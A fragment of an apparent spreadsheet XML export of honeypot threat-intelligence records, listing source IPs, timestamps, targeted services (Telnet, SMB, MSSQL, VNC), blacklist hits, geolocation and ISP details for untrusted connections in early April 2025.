    <s v="business"/>
    <s v="M1 LIMITED"/>
    <s v="1990-03-02"/>
    <s v="M1LIMITED-SG"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8a4b:3b4f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3216"/>
    <x v="3216"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:35:36"/>
    <d v="2025-04-04T07:35:36"/>
    <d v="2025-04-04T07:35:36"/>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d8:13af"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3217"/>
    <x v="3217"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:35:20"/>
    <d v="2025-04-04T05:09:51"/>
    <d v="2025-04-04T07:35:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2005-09-21"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d63:d0f5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3218"/>
    <x v="3218"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:33:48"/>
    <d v="2025-03-31T22:44:52"/>
    <d v="2025-04-04T07:33:48"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="KE"/>
    <s v="Kenya"/>
    <s v="30"/>
    <s v="Nairobi County"/>
    <s v="NA"/>
    <s v="Nairobi"/>
    <s v="184745"/>
    <s v="00100"/>
    <s v="-1.29207"/>
    <s v="36.8219"/>
    <s v="30844"/>
    <s v="Liquid Telecommunications Ltd"/>
    <s v="Maintainer Liquid Telecommunications Operations Limited"/>
    <s v="business"/>
    <s v="Liquid Telecommunications Operations Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293c:90c4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3219"/>
    <x v="3219"/>
    <s v="NA&amp;&amp;65-130-44-45.slkc.qwest.net"/>
    <x v="0"/>
    <d v="2025-04-04T07:29:30"/>
    <d v="2025-04-04T07:15:01"/>
    <d v="2025-04-04T07:29:30"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="UT"/>
    <s v="Utah"/>
    <s v="Salt Lake"/>
    <s v="Salt Lake City"/>
    <s v="5780993"/>
    <s v="84138"/>
    <s v="40.7608"/>
    <s v="-111.891"/>
    <s v="209"/>
    <s v="CenturyLink Communications, LLC"/>
    <s v="CenturyLink Communications, LLC"/>
    <s v="business"/>
    <s v="CenturyLink Communications, LLC"/>
    <s v="2000-08-23"/>
    <s v="CENTURYLINK-LEGACY-QWEST-INET-18"/>
    <s v="2018-02-21"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-08-28 04:00:00"/>
    <s v="2025-08-27 04:00:00"/>
    <s v="2023-08-23 05:15:15"/>
    <s v="['AUTHNS1.QWEST.NET', 'AUTHNS2.QWEST.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited']"/>
    <s v="None"/>
    <x v="36"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:4182:2c2d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3220"/>
    <x v="3220"/>
    <s v="111-242-222-54.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:21:28"/>
    <d v="2025-04-04T05:58:28"/>
    <d v="2025-04-04T07:21:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="None"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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6ff2:de36"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3221"/>
    <x v="3221"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T07:13:14"/>
    <d v="2025-04-04T07:13:14"/>
    <d v="2025-04-04T07:13:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Xindian District"/>
    <s v="1674828"/>
    <s v="NA"/>
    <s v="24.9601"/>
    <s v="121.539"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b73:cc10"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3222"/>
    <x v="3222"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T06:56:06"/>
    <d v="2025-04-04T06:49:37"/>
    <d v="2025-04-04T06:56:06"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay"/>
    <s v="2001-12-27"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:1e8e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3223"/>
    <x v="3223"/>
    <s v="NA&amp;&amp;114-26-93-48.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T06:45:56"/>
    <d v="2025-03-05T14:02:13"/>
    <d v="2025-04-04T06:45:56"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="445&amp;&amp;23"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SMB:Incoming connection (114.26.93.48,52945)}&amp;&amp;{Data_SMB:Incoming connection (114.26.93.48,52998)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (114.26.93.48,53954)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_TELNET: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721a:5d30"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3224"/>
    <x v="3224"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T06:29:58"/>
    <d v="2025-04-04T04:21:04"/>
    <d v="2025-04-04T06:29:58"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}"/>
    <n v="157"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Kasaragod"/>
    <s v="Kāsaragod"/>
    <s v="1267616"/>
    <s v="NA"/>
    <s v="12.4984"/>
    <s v="74.9896"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="cellular"/>
    <s v="Cdma Project"/>
    <s v="2007-08-01"/>
    <s v="CDMA-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:229a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3225"/>
    <x v="3225"/>
    <s v="NA&amp;&amp;nz82l129.bb60246.ctm.net"/>
    <x v="0"/>
    <d v="2025-04-04T06:28:54"/>
    <d v="2025-04-04T06:18:14"/>
    <d v="2025-04-04T06:28:54"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MO"/>
    <s v="Macao"/>
    <s v="NA"/>
    <s v="Nossa Senhora do Carmo"/>
    <s v="NA"/>
    <s v="Taipa"/>
    <s v="1821263"/>
    <s v="NA"/>
    <s v="22.1597"/>
    <s v="113.564"/>
    <s v="4609"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="business"/>
    <s v="CTM Internet Service"/>
    <s v="2010-12-31"/>
    <s v="CTM-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cf6:5281"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3226"/>
    <x v="3226"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T06:05:40"/>
    <d v="2025-02-27T09:14:30"/>
    <d v="2025-04-04T06:05:40"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:889b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3227"/>
    <x v="3227"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:48:34"/>
    <d v="2025-04-04T05:48:34"/>
    <d v="2025-04-04T05:48:34"/>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f1:bf1c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3228"/>
    <x v="3228"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:43:40"/>
    <d v="2025-04-04T05:43:40"/>
    <d v="2025-04-04T05:43:40"/>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3b5f:85f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3229"/>
    <x v="3229"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:38:56"/>
    <d v="2025-04-04T05:38:56"/>
    <d v="2025-04-04T05:38:56"/>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3d01:80e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3230"/>
    <x v="3230"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:38:11"/>
    <d v="2025-04-03T09:43:56"/>
    <d v="2025-04-04T05:38:11"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:9154"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3231"/>
    <x v="3231"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:19:37"/>
    <d v="2025-04-04T05:19:37"/>
    <d v="2025-04-04T05:19:37"/>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3:2593"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3232"/>
    <x v="3232"/>
    <s v="n119236236006.netvigator.com"/>
    <x v="0"/>
    <d v="2025-04-04T05:17:25"/>
    <d v="2025-04-04T05:17:25"/>
    <d v="2025-04-04T05:17:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="HKTIMS-AP"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="corporate"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-02-09 05:00:00"/>
    <s v="2026-02-10 05:00:00"/>
    <s v="2025-02-06 06:38:39"/>
    <s v="['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="24"/>
    <s v="NA"/>
    <s v="RM902, 9F East Exchange Tower 38-40 Leighton Road"/>
    <s v="::ffff:77ec:ec06"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3233"/>
    <x v="3233"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T05:03:57"/>
    <d v="2025-04-04T05:03:57"/>
    <d v="2025-04-04T05:03:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon City"/>
    <s v="1819607"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3182:b1d5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3234"/>
    <x v="3234"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T04:51:54"/>
    <d v="2025-04-04T04:49:37"/>
    <d v="2025-04-04T04:51:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18559"/>
    <s v="106.823"/>
    <s v="4800"/>
    <s v="PT Aplikanusa Lintasarta"/>
    <s v="LINTASARTA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-02-15"/>
    <s v="LINTASARTA-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7be7:bed2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3235"/>
    <x v="3235"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T04:47:55"/>
    <d v="2025-03-02T12:50:35"/>
    <d v="2025-04-04T04:47:55"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BY"/>
    <s v="Bavaria"/>
    <s v="Swabia"/>
    <s v="Augsburg"/>
    <s v="2954172"/>
    <s v="86161"/>
    <s v="48.3459"/>
    <s v="10.9161"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="Railnet LLC"/>
    <s v="business"/>
    <s v="Virtualine Technologies"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d5d1:9696"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3236"/>
    <x v="3236"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T04:34:44"/>
    <d v="2024-04-11T17:26:00"/>
    <d v="2025-04-04T04:34:44"/>
    <n v="42"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="31129&amp;&amp;23&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="UT"/>
    <s v="Utah"/>
    <s v="Summit"/>
    <s v="Kamas"/>
    <s v="5776692"/>
    <s v="84036"/>
    <s v="40.645"/>
    <s v="-111.282"/>
    <s v="13614"/>
    <s v="All West Communications, Inc."/>
    <s v="All West Communications"/>
    <s v="business"/>
    <s v="All West Communications, Inc."/>
    <s v="2019-01-30"/>
    <s v="ALLWEST-8"/>
    <s v="2019-11-15"/>
